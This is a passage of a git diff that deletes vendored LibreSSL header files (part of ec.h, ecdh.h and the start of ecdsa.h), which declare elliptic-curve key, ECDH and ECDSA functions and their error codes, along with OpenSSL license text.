-int EC_GROUP_precompute_mult(EC_GROUP *group, BN_CTX *ctx);
-
-/** Reports whether a precomputation has been done
- *  \param  group  EC_GROUP object
- *  \return 1 if a pre-computation has been done and 0 otherwise
- */
-int EC_GROUP_have_precompute_mult(const EC_GROUP *group);
-
-
-/********************************************************************/
-/*                       ASN1 stuff                                 */
-/********************************************************************/
-
-/* EC_GROUP_get_basis_type() returns the NID of the basis type
- * used to represent the field elements */
-int EC_GROUP_get_basis_type(const EC_GROUP *);
-#ifndef OPENSSL_NO_EC2M
-int EC_GROUP_get_trinomial_basis(const EC_GROUP *, unsigned int *k);
-int EC_GROUP_get_pentanomial_basis(const EC_GROUP *, unsigned int *k1, 
-	unsigned int *k2, unsigned int *k3);
-#endif
-
-#define OPENSSL_EC_NAMED_CURVE	0x001
-
-typedef struct ecpk_parameters_st ECPKPARAMETERS;
-
-EC_GROUP *d2i_ECPKParameters(EC_GROUP **, const unsigned char **in, long len);
-int i2d_ECPKParameters(const EC_GROUP *, unsigned char **out);
-
-#define d2i_ECPKParameters_bio(bp,x) ASN1_d2i_bio_of(EC_GROUP,NULL,d2i_ECPKParameters,bp,x)
-#define i2d_ECPKParameters_bio(bp,x) ASN1_i2d_bio_of_const(EC_GROUP,i2d_ECPKParameters,bp,x)
-#define d2i_ECPKParameters_fp(fp,x) (EC_GROUP *)ASN1_d2i_fp(NULL, \
-                (char *(*)())d2i_ECPKParameters,(fp),(unsigned char **)(x))
-#define i2d_ECPKParameters_fp(fp,x) ASN1_i2d_fp(i2d_ECPKParameters,(fp), \
-		(unsigned char *)(x))
-
-#ifndef OPENSSL_NO_BIO
-int     ECPKParameters_print(BIO *bp, const EC_GROUP *x, int off);
-#endif
-int     ECPKParameters_print_fp(FILE *fp, const EC_GROUP *x, int off);
-
-
-/********************************************************************/
-/*                      EC_KEY functions                            */
-/********************************************************************/
-
-typedef struct ec_key_st EC_KEY;
-
-/* some values for the encoding_flag */
-#define EC_PKEY_NO_PARAMETERS	0x001
-#define EC_PKEY_NO_PUBKEY	0x002
-
-/* some values for the flags field */
-#define EC_FLAG_NON_FIPS_ALLOW	0x1
-#define EC_FLAG_FIPS_CHECKED	0x2
-
-/** Creates a new EC_KEY object.
- *  \return EC_KEY object or NULL if an error occurred.
- */
-EC_KEY *EC_KEY_new(void);
-
-int EC_KEY_get_flags(const EC_KEY *key);
-
-void EC_KEY_set_flags(EC_KEY *key, int flags);
-
-void EC_KEY_clear_flags(EC_KEY *key, int flags);
-
-/** Creates a new EC_KEY object using a named curve as underlying
- *  EC_GROUP object.
- *  \param  nid  NID of the named curve.
- *  \return EC_KEY object or NULL if an error occurred. 
- */
-EC_KEY *EC_KEY_new_by_curve_name(int nid);
-
-/** Frees a EC_KEY object.
- *  \param  key  EC_KEY object to be freed.
- */
-void EC_KEY_free(EC_KEY *key);
-
-/** Copies a EC_KEY object.
- *  \param  dst  destination EC_KEY object
- *  \param  src  src EC_KEY object
- *  \return dst or NULL if an error occurred.
- */
-EC_KEY *EC_KEY_copy(EC_KEY *dst, const EC_KEY *src);
-
-/** Creates a new EC_KEY object and copies the content from src to it.
- *  \param  src  the source EC_KEY object
- *  \return newly created EC_KEY object or NULL if an error occurred.
- */
-EC_KEY *EC_KEY_dup(const EC_KEY *src);
-
-/** Increases the internal reference count of a EC_KEY object.
- *  \param  key  EC_KEY object
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_up_ref(EC_KEY *key);
-
-/** Returns the EC_GROUP object of a EC_KEY object
- *  \param  key  EC_KEY object
- *  \return the EC_GROUP object (possibly NULL).
- */
-const EC_GROUP *EC_KEY_get0_group(const EC_KEY *key);
-
-/** Sets the EC_GROUP of a EC_KEY object.
- *  \param  key    EC_KEY object
- *  \param  group  EC_GROUP to use in the EC_KEY object (note: the EC_KEY
- *                 object will use an own copy of the EC_GROUP).
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_set_group(EC_KEY *key, const EC_GROUP *group);
-
-/** Returns the private key of a EC_KEY object.
- *  \param  key  EC_KEY object
- *  \return a BIGNUM with the private key (possibly NULL).
- */
-const BIGNUM *EC_KEY_get0_private_key(const EC_KEY *key);
-
-/** Sets the private key of a EC_KEY object.
- *  \param  key  EC_KEY object
- *  \param  prv  BIGNUM with the private key (note: the EC_KEY object
- *               will use an own copy of the BIGNUM).
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_set_private_key(EC_KEY *key, const BIGNUM *prv);
-
-/** Returns the public key of a EC_KEY object.
- *  \param  key  the EC_KEY object
- *  \return a EC_POINT object with the public key (possibly NULL)
- */
-const EC_POINT *EC_KEY_get0_public_key(const EC_KEY *key);
-
-/** Sets the public key of a EC_KEY object.
- *  \param  key  EC_KEY object
- *  \param  pub  EC_POINT object with the public key (note: the EC_KEY object
- *               will use an own copy of the EC_POINT object).
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_set_public_key(EC_KEY *key, const EC_POINT *pub);
-
-unsigned EC_KEY_get_enc_flags(const EC_KEY *key);
-void EC_KEY_set_enc_flags(EC_KEY *eckey, unsigned int flags);
-point_conversion_form_t EC_KEY_get_conv_form(const EC_KEY *key);
-void EC_KEY_set_conv_form(EC_KEY *eckey, point_conversion_form_t cform);
-/* functions to set/get method specific data  */
-void *EC_KEY_get_key_method_data(EC_KEY *key, 
-	void *(*dup_func)(void *), void (*free_func)(void *), void (*clear_free_func)(void *));
-/** Sets the key method data of an EC_KEY object, if none has yet been set.
- *  \param  key              EC_KEY object
- *  \param  data             opaque data to install.
- *  \param  dup_func         a function that duplicates |data|.
- *  \param  free_func        a function that frees |data|.
- *  \param  clear_free_func  a function that wipes and frees |data|.
- *  \return the previously set data pointer, or NULL if |data| was inserted.
- */
-void *EC_KEY_insert_key_method_data(EC_KEY *key, void *data,
-	void *(*dup_func)(void *), void (*free_func)(void *), void (*clear_free_func)(void *));
-/* wrapper functions for the underlying EC_GROUP object */
-void EC_KEY_set_asn1_flag(EC_KEY *eckey, int asn1_flag);
-
-/** Creates a table of pre-computed multiples of the generator to 
- *  accelerate further EC_KEY operations.
- *  \param  key  EC_KEY object
- *  \param  ctx  BN_CTX object (optional)
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_precompute_mult(EC_KEY *key, BN_CTX *ctx);
-
-/** Creates a new ec private (and optional a new public) key.
- *  \param  key  EC_KEY object
- *  \return 1 on success and 0 if an error occurred.
- */
-int EC_KEY_generate_key(EC_KEY *key);
-
-/** Verifies that a private and/or public key is valid.
- *  \param  key  the EC_KEY object
- *  \return 1 on success and 0 otherwise.
- */
-int EC_KEY_check_key(const EC_KEY *key);
-
-/** Sets a public key from affine coordindates performing
- *  neccessary NIST PKV tests.
- *  \param  key  the EC_KEY object
- *  \param  x    public key x coordinate
- *  \param  y    public key y coordinate
- *  \return 1 on success and 0 otherwise.
- */
-int EC_KEY_set_public_key_affine_coordinates(EC_KEY *key, BIGNUM *x, BIGNUM *y);
-
-
-/********************************************************************/
-/*        de- and encoding functions for SEC1 ECPrivateKey          */
-/********************************************************************/
-
-/** Decodes a private key from a memory buffer.
- *  \param  key  a pointer to a EC_KEY object which should be used (or NULL)
- *  \param  in   pointer to memory with the DER encoded private key
- *  \param  len  length of the DER encoded private key
- *  \return the decoded private key or NULL if an error occurred.
- */
-EC_KEY *d2i_ECPrivateKey(EC_KEY **key, const unsigned char **in, long len);
-
-/** Encodes a private key object and stores the result in a buffer.
- *  \param  key  the EC_KEY object to encode
- *  \param  out  the buffer for the result (if NULL the function returns number
- *               of bytes needed).
- *  \return 1 on success and 0 if an error occurred.
- */
-int i2d_ECPrivateKey(EC_KEY *key, unsigned char **out);
-
-
-/********************************************************************/
-/*        de- and encoding functions for EC parameters              */
-/********************************************************************/
-
-/** Decodes ec parameter from a memory buffer.
- *  \param  key  a pointer to a EC_KEY object which should be used (or NULL)
- *  \param  in   pointer to memory with the DER encoded ec parameters
- *  \param  len  length of the DER encoded ec parameters
- *  \return a EC_KEY object with the decoded parameters or NULL if an error
- *          occurred.
- */
-EC_KEY *d2i_ECParameters(EC_KEY **key, const unsigned char **in, long len);
-
-/** Encodes ec parameter and stores the result in a buffer.
- *  \param  key  the EC_KEY object with ec paramters to encode
- *  \param  out  the buffer for the result (if NULL the function returns number
- *               of bytes needed).
- *  \return 1 on success and 0 if an error occurred.
- */
-int i2d_ECParameters(EC_KEY *key, unsigned char **out);
-
-
-/********************************************************************/
-/*         de- and encoding functions for EC public key             */
-/*         (octet string, not DER -- hence 'o2i' and 'i2o')         */
-/********************************************************************/
-
-/** Decodes a ec public key from a octet string.
- *  \param  key  a pointer to a EC_KEY object which should be used
- *  \param  in   memory buffer with the encoded public key
- *  \param  len  length of the encoded public key
- *  \return EC_KEY object with decoded public key or NULL if an error
- *          occurred.
- */
-EC_KEY *o2i_ECPublicKey(EC_KEY **key, const unsigned char **in, long len);
-
-/** Encodes a ec public key in an octet string.
- *  \param  key  the EC_KEY object with the public key
- *  \param  out  the buffer for the result (if NULL the function returns number
- *               of bytes needed).
- *  \return 1 on success and 0 if an error occurred
- */
-int i2o_ECPublicKey(EC_KEY *key, unsigned char **out);
-
-#ifndef OPENSSL_NO_BIO
-/** Prints out the ec parameters on human readable form.
- *  \param  bp   BIO object to which the information is printed
- *  \param  key  EC_KEY object
- *  \return 1 on success and 0 if an error occurred
- */
-int	ECParameters_print(BIO *bp, const EC_KEY *key);
-
-/** Prints out the contents of a EC_KEY object
- *  \param  bp   BIO object to which the information is printed
- *  \param  key  EC_KEY object
- *  \param  off  line offset 
- *  \return 1 on success and 0 if an error occurred
- */
-int	EC_KEY_print(BIO *bp, const EC_KEY *key, int off);
-
-#endif
-/** Prints out the ec parameters on human readable form.
- *  \param  fp   file descriptor to which the information is printed
- *  \param  key  EC_KEY object
- *  \return 1 on success and 0 if an error occurred
- */
-int	ECParameters_print_fp(FILE *fp, const EC_KEY *key);
-
-/** Prints out the contents of a EC_KEY object
- *  \param  fp   file descriptor to which the information is printed
- *  \param  key  EC_KEY object
- *  \param  off  line offset 
- *  \return 1 on success and 0 if an error occurred
- */
-int	EC_KEY_print_fp(FILE *fp, const EC_KEY *key, int off);
-
-EC_KEY *ECParameters_dup(EC_KEY *key);
-
-#ifndef __cplusplus
-#if defined(__SUNPRO_C)
-#  if __SUNPRO_C >= 0x520
-# pragma error_messages (default,E_ARRAY_OF_INCOMPLETE_NONAME,E_ARRAY_OF_INCOMPLETE)
-#  endif
-# endif
-#endif
-
-#define EVP_PKEY_CTX_set_ec_paramgen_curve_nid(ctx, nid) \
-	EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_EC, EVP_PKEY_OP_PARAMGEN, \
-				EVP_PKEY_CTRL_EC_PARAMGEN_CURVE_NID, nid, NULL)
-
-
-#define EVP_PKEY_CTRL_EC_PARAMGEN_CURVE_NID		(EVP_PKEY_ALG_CTRL + 1)
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_EC_strings(void);
-
-/* Error codes for the EC functions. */
-
-/* Function codes. */
-#define EC_F_BN_TO_FELEM				 224
-#define EC_F_COMPUTE_WNAF				 143
-#define EC_F_D2I_ECPARAMETERS				 144
-#define EC_F_D2I_ECPKPARAMETERS				 145
-#define EC_F_D2I_ECPRIVATEKEY				 146
-#define EC_F_DO_EC_KEY_PRINT				 221
-#define EC_F_ECKEY_PARAM2TYPE				 223
-#define EC_F_ECKEY_PARAM_DECODE				 212
-#define EC_F_ECKEY_PRIV_DECODE				 213
-#define EC_F_ECKEY_PRIV_ENCODE				 214
-#define EC_F_ECKEY_PUB_DECODE				 215
-#define EC_F_ECKEY_PUB_ENCODE				 216
-#define EC_F_ECKEY_TYPE2PARAM				 220
-#define EC_F_ECPARAMETERS_PRINT				 147
-#define EC_F_ECPARAMETERS_PRINT_FP			 148
-#define EC_F_ECPKPARAMETERS_PRINT			 149
-#define EC_F_ECPKPARAMETERS_PRINT_FP			 150
-#define EC_F_ECP_NIST_MOD_192				 203
-#define EC_F_ECP_NIST_MOD_224				 204
-#define EC_F_ECP_NIST_MOD_256				 205
-#define EC_F_ECP_NIST_MOD_521				 206
-#define EC_F_ECP_NISTZ256_GET_AFFINE			 240
-#define EC_F_ECP_NISTZ256_MULT_PRECOMPUTE		 243
-#define EC_F_ECP_NISTZ256_POINTS_MUL			 241
-#define EC_F_ECP_NISTZ256_PRE_COMP_NEW			 244
-#define EC_F_ECP_NISTZ256_SET_WORDS			 245
-#define EC_F_ECP_NISTZ256_WINDOWED_MUL			 242
-#define EC_F_EC_ASN1_GROUP2CURVE			 153
-#define EC_F_EC_ASN1_GROUP2FIELDID			 154
-#define EC_F_EC_ASN1_GROUP2PARAMETERS			 155
-#define EC_F_EC_ASN1_GROUP2PKPARAMETERS			 156
-#define EC_F_EC_ASN1_PARAMETERS2GROUP			 157
-#define EC_F_EC_ASN1_PKPARAMETERS2GROUP			 158
-#define EC_F_EC_EX_DATA_SET_DATA			 211
-#define EC_F_EC_GF2M_MONTGOMERY_POINT_MULTIPLY		 208
-#define EC_F_EC_GF2M_SIMPLE_GROUP_CHECK_DISCRIMINANT	 159
-#define EC_F_EC_GF2M_SIMPLE_GROUP_SET_CURVE		 195
-#define EC_F_EC_GF2M_SIMPLE_OCT2POINT			 160
-#define EC_F_EC_GF2M_SIMPLE_POINT2OCT			 161
-#define EC_F_EC_GF2M_SIMPLE_POINT_GET_AFFINE_COORDINATES 162
-#define EC_F_EC_GF2M_SIMPLE_POINT_SET_AFFINE_COORDINATES 163
-#define EC_F_EC_GF2M_SIMPLE_SET_COMPRESSED_COORDINATES	 164
-#define EC_F_EC_GFP_MONT_FIELD_DECODE			 133
-#define EC_F_EC_GFP_MONT_FIELD_ENCODE			 134
-#define EC_F_EC_GFP_MONT_FIELD_MUL			 131
-#define EC_F_EC_GFP_MONT_FIELD_SET_TO_ONE		 209
-#define EC_F_EC_GFP_MONT_FIELD_SQR			 132
-#define EC_F_EC_GFP_MONT_GROUP_SET_CURVE		 189
-#define EC_F_EC_GFP_MONT_GROUP_SET_CURVE_GFP		 135
-#define EC_F_EC_GFP_NISTP224_GROUP_SET_CURVE		 225
-#define EC_F_EC_GFP_NISTP224_POINTS_MUL			 228
-#define EC_F_EC_GFP_NISTP224_POINT_GET_AFFINE_COORDINATES 226
-#define EC_F_EC_GFP_NISTP256_GROUP_SET_CURVE		 230
-#define EC_F_EC_GFP_NISTP256_POINTS_MUL			 231
-#define EC_F_EC_GFP_NISTP256_POINT_GET_AFFINE_COORDINATES 232
-#define EC_F_EC_GFP_NISTP521_GROUP_SET_CURVE		 233
-#define EC_F_EC_GFP_NISTP521_POINTS_MUL			 234
-#define EC_F_EC_GFP_NISTP521_POINT_GET_AFFINE_COORDINATES 235
-#define EC_F_EC_GFP_NIST_FIELD_MUL			 200
-#define EC_F_EC_GFP_NIST_FIELD_SQR			 201
-#define EC_F_EC_GFP_NIST_GROUP_SET_CURVE		 202
-#define EC_F_EC_GFP_SIMPLE_GROUP_CHECK_DISCRIMINANT	 165
-#define EC_F_EC_GFP_SIMPLE_GROUP_SET_CURVE		 166
-#define EC_F_EC_GFP_SIMPLE_GROUP_SET_CURVE_GFP		 100
-#define EC_F_EC_GFP_SIMPLE_GROUP_SET_GENERATOR		 101
-#define EC_F_EC_GFP_SIMPLE_MAKE_AFFINE			 102
-#define EC_F_EC_GFP_SIMPLE_OCT2POINT			 103
-#define EC_F_EC_GFP_SIMPLE_POINT2OCT			 104
-#define EC_F_EC_GFP_SIMPLE_POINTS_MAKE_AFFINE		 137
-#define EC_F_EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES	 167
-#define EC_F_EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES_GFP 105
-#define EC_F_EC_GFP_SIMPLE_POINT_SET_AFFINE_COORDINATES	 168
-#define EC_F_EC_GFP_SIMPLE_POINT_SET_AFFINE_COORDINATES_GFP 128
-#define EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES	 169
-#define EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES_GFP 129
-#define EC_F_EC_GROUP_CHECK				 170
-#define EC_F_EC_GROUP_CHECK_DISCRIMINANT		 171
-#define EC_F_EC_GROUP_COPY				 106
-#define EC_F_EC_GROUP_GET0_GENERATOR			 139
-#define EC_F_EC_GROUP_GET_COFACTOR			 140
-#define EC_F_EC_GROUP_GET_CURVE_GF2M			 172
-#define EC_F_EC_GROUP_GET_CURVE_GFP			 130
-#define EC_F_EC_GROUP_GET_DEGREE			 173
-#define EC_F_EC_GROUP_GET_ORDER				 141
-#define EC_F_EC_GROUP_GET_PENTANOMIAL_BASIS		 193
-#define EC_F_EC_GROUP_GET_TRINOMIAL_BASIS		 194
-#define EC_F_EC_GROUP_NEW				 108
-#define EC_F_EC_GROUP_NEW_BY_CURVE_NAME			 174
-#define EC_F_EC_GROUP_NEW_FROM_DATA			 175
-#define EC_F_EC_GROUP_PRECOMPUTE_MULT			 142
-#define EC_F_EC_GROUP_SET_CURVE_GF2M			 176
-#define EC_F_EC_GROUP_SET_CURVE_GFP			 109
-#define EC_F_EC_GROUP_SET_EXTRA_DATA			 110
-#define EC_F_EC_GROUP_SET_GENERATOR			 111
-#define EC_F_EC_KEY_CHECK_KEY				 177
-#define EC_F_EC_KEY_COPY				 178
-#define EC_F_EC_KEY_GENERATE_KEY			 179
-#define EC_F_EC_KEY_NEW					 182
-#define EC_F_EC_KEY_PRINT				 180
-#define EC_F_EC_KEY_PRINT_FP				 181
-#define EC_F_EC_KEY_SET_PUBLIC_KEY_AFFINE_COORDINATES	 229
-#define EC_F_EC_POINTS_MAKE_AFFINE			 136
-#define EC_F_EC_POINT_ADD				 112
-#define EC_F_EC_POINT_CMP				 113
-#define EC_F_EC_POINT_COPY				 114
-#define EC_F_EC_POINT_DBL				 115
-#define EC_F_EC_POINT_GET_AFFINE_COORDINATES_GF2M	 183
-#define EC_F_EC_POINT_GET_AFFINE_COORDINATES_GFP	 116
-#define EC_F_EC_POINT_GET_JPROJECTIVE_COORDINATES_GFP	 117
-#define EC_F_EC_POINT_INVERT				 210
-#define EC_F_EC_POINT_IS_AT_INFINITY			 118
-#define EC_F_EC_POINT_IS_ON_CURVE			 119
-#define EC_F_EC_POINT_MAKE_AFFINE			 120
-#define EC_F_EC_POINT_MUL				 184
-#define EC_F_EC_POINT_NEW				 121
-#define EC_F_EC_POINT_OCT2POINT				 122
-#define EC_F_EC_POINT_POINT2OCT				 123
-#define EC_F_EC_POINT_SET_AFFINE_COORDINATES_GF2M	 185
-#define EC_F_EC_POINT_SET_AFFINE_COORDINATES_GFP	 124
-#define EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GF2M	 186
-#define EC_F_EC_POINT_SET_COMPRESSED_COORDINATES_GFP	 125
-#define EC_F_EC_POINT_SET_JPROJECTIVE_COORDINATES_GFP	 126
-#define EC_F_EC_POINT_SET_TO_INFINITY			 127
-#define EC_F_EC_PRE_COMP_DUP				 207
-#define EC_F_EC_PRE_COMP_NEW				 196
-#define EC_F_EC_WNAF_MUL				 187
-#define EC_F_EC_WNAF_PRECOMPUTE_MULT			 188
-#define EC_F_I2D_ECPARAMETERS				 190
-#define EC_F_I2D_ECPKPARAMETERS				 191
-#define EC_F_I2D_ECPRIVATEKEY				 192
-#define EC_F_I2O_ECPUBLICKEY				 151
-#define EC_F_NISTP224_PRE_COMP_NEW			 227
-#define EC_F_NISTP256_PRE_COMP_NEW			 236
-#define EC_F_NISTP521_PRE_COMP_NEW			 237
-#define EC_F_O2I_ECPUBLICKEY				 152
-#define EC_F_OLD_EC_PRIV_DECODE				 222
-#define EC_F_PKEY_EC_CTRL				 197
-#define EC_F_PKEY_EC_CTRL_STR				 198
-#define EC_F_PKEY_EC_DERIVE				 217
-#define EC_F_PKEY_EC_KEYGEN				 199
-#define EC_F_PKEY_EC_PARAMGEN				 219
-#define EC_F_PKEY_EC_SIGN				 218
-
-/* Reason codes. */
-#define EC_R_ASN1_ERROR					 115
-#define EC_R_ASN1_UNKNOWN_FIELD				 116
-#define EC_R_BIGNUM_OUT_OF_RANGE			 144
-#define EC_R_BUFFER_TOO_SMALL				 100
-#define EC_R_COORDINATES_OUT_OF_RANGE			 146
-#define EC_R_D2I_ECPKPARAMETERS_FAILURE			 117
-#define EC_R_DECODE_ERROR				 142
-#define EC_R_DISCRIMINANT_IS_ZERO			 118
-#define EC_R_EC_GROUP_NEW_BY_NAME_FAILURE		 119
-#define EC_R_FIELD_TOO_LARGE				 143
-#define EC_R_GF2M_NOT_SUPPORTED				 147
-#define EC_R_GROUP2PKPARAMETERS_FAILURE			 120
-#define EC_R_I2D_ECPKPARAMETERS_FAILURE			 121
-#define EC_R_INCOMPATIBLE_OBJECTS			 101
-#define EC_R_INVALID_ARGUMENT				 112
-#define EC_R_INVALID_COMPRESSED_POINT			 110
-#define EC_R_INVALID_COMPRESSION_BIT			 109
-#define EC_R_INVALID_CURVE				 141
-#define EC_R_INVALID_DIGEST_TYPE			 138
-#define EC_R_INVALID_ENCODING				 102
-#define EC_R_INVALID_FIELD				 103
-#define EC_R_INVALID_FORM				 104
-#define EC_R_INVALID_GROUP_ORDER			 122
-#define EC_R_INVALID_PENTANOMIAL_BASIS			 132
-#define EC_R_INVALID_PRIVATE_KEY			 123
-#define EC_R_INVALID_TRINOMIAL_BASIS			 137
-#define EC_R_KEYS_NOT_SET				 140
-#define EC_R_MISSING_PARAMETERS				 124
-#define EC_R_MISSING_PRIVATE_KEY			 125
-#define EC_R_NOT_A_NIST_PRIME				 135
-#define EC_R_NOT_A_SUPPORTED_NIST_PRIME			 136
-#define EC_R_NOT_IMPLEMENTED				 126
-#define EC_R_NOT_INITIALIZED				 111
-#define EC_R_NO_FIELD_MOD				 133
-#define EC_R_NO_PARAMETERS_SET				 139
-#define EC_R_PASSED_NULL_PARAMETER			 134
-#define EC_R_PKPARAMETERS2GROUP_FAILURE			 127
-#define EC_R_POINT_AT_INFINITY				 106
-#define EC_R_POINT_IS_NOT_ON_CURVE			 107
-#define EC_R_SLOT_FULL					 108
-#define EC_R_UNDEFINED_GENERATOR			 113
-#define EC_R_UNDEFINED_ORDER				 128
-#define EC_R_UNKNOWN_GROUP				 129
-#define EC_R_UNKNOWN_ORDER				 114
-#define EC_R_UNSUPPORTED_FIELD				 131
-#define EC_R_WRONG_CURVE_PARAMETERS			 145
-#define EC_R_WRONG_ORDER				 130
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ecdh.h b/thirdparty/libressl/include/openssl/ecdh.h
deleted file mode 100644
index ccc1312..0000000
--- a/thirdparty/libressl/include/openssl/ecdh.h
+++ /dev/null
@@ -1,128 +0,0 @@
-/* $OpenBSD: ecdh.h,v 1.5 2015/09/13 12:03:07 jsing Exp $ */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- *
- * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
- * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
- * to the OpenSSL project.
- *
- * The ECC Code is licensed pursuant to the OpenSSL open source
- * license provided below.
- *
- * The ECDH software is originally written by Douglas Stebila of
- * Sun Microsystems Laboratories.
- *
- */
-/* ====================================================================
- * Copyright (c) 2000-2002 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-#ifndef HEADER_ECDH_H
-#define HEADER_ECDH_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_ECDH
-#error ECDH is disabled.
-#endif
-
-#include <openssl/ec.h>
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-const ECDH_METHOD *ECDH_OpenSSL(void);
-
-void ECDH_set_default_method(const ECDH_METHOD *);
-const ECDH_METHOD *ECDH_get_default_method(void);
-int ECDH_set_method(EC_KEY *, const ECDH_METHOD *);
-
-int ECDH_size(const EC_KEY *ecdh);
-int ECDH_compute_key(void *out, size_t outlen, const EC_POINT *pub_key,
-    EC_KEY *ecdh,
-    void *(*KDF)(const void *in, size_t inlen, void *out, size_t *outlen));
-
-int 	  ECDH_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new
-*new_func, CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int 	  ECDH_set_ex_data(EC_KEY *d, int idx, void *arg);
-void 	  *ECDH_get_ex_data(EC_KEY *d, int idx);
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_ECDH_strings(void);
-
-/* Error codes for the ECDH functions. */
-
-/* Function codes. */
-#define ECDH_F_ECDH_CHECK				 102
-#define ECDH_F_ECDH_COMPUTE_KEY				 100
-#define ECDH_F_ECDH_DATA_NEW_METHOD			 101
-
-/* Reason codes. */
-#define ECDH_R_KDF_FAILED				 102
-#define ECDH_R_KEY_TRUNCATION				 104
-#define ECDH_R_NON_FIPS_METHOD				 103
-#define ECDH_R_NO_PRIVATE_VALUE				 100
-#define ECDH_R_POINT_ARITHMETIC_FAILURE			 101
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ecdsa.h b/thirdparty/libressl/include/openssl/ecdsa.h
deleted file mode 100644
index 530ab26..0000000
--- a/thirdparty/libressl/include/openssl/ecdsa.h
+++ /dev/null
@@ -1,286 +0,0 @@
-/* $OpenBSD: ecdsa.h,v 1.4 2015/02/08 13:35:06 jsing Exp $ */
-/**
- * \file   crypto/ecdsa/ecdsa.h Include file for the OpenSSL ECDSA functions
- * \author Written by Nils Larsch for the OpenSSL project
- */
-/* ====================================================================
- * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
